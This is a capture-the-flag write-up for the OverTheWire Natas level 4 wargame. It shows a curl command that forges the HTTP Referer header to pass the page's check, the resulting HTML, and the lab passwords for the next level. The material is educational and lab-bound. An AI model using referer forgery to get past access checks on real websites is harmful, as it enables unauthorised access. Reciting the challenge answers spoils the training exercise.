Natas- level 4 Writeup

In this level we login with the credentials given at the previous level.

level4

After a while a clue is being given on the front end itself. It says users should come only from “http://natas5.natas.labs.overthewire.org” which means there is a referer checck involved we can do this via many ways.

If you are using chrome check this add on Referer Control with this easy referer manipulator you can get this over with in a jiffy

buut if you insist that you wont take the GUI way follow me 😉

we can manipulate the referer using the cURL command.

so open up cmd and enter the folowing

curl –user natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ –referer http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire.org/

this will result in the webpage source rendered in the cmd

C:\Users\rhadmael>
C:\Users\rhadmael>curl --user natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ --refere
r http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire
.org/
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
	<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/c
ss/level.css">
	<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css
" />
	<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css"
/>
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><scrip
t src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas4", "pass": "Z9tkRkWmpt9Qr7XrR5jWRkgO
U901swEZ" };</script></head>
<body>
<h1>natas4</h1>
<div id="content">

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>
</html>
C:\Users\rhadmael>

in the rendered data the credentials or the next level are given.

Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
URL: http://natas5.natas.labs.overthewire.org/

Follow the next post for NATAS 5 Write Up

NATAS 5

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Blog at WordPress.com.

Up ↑

%d bloggers like this: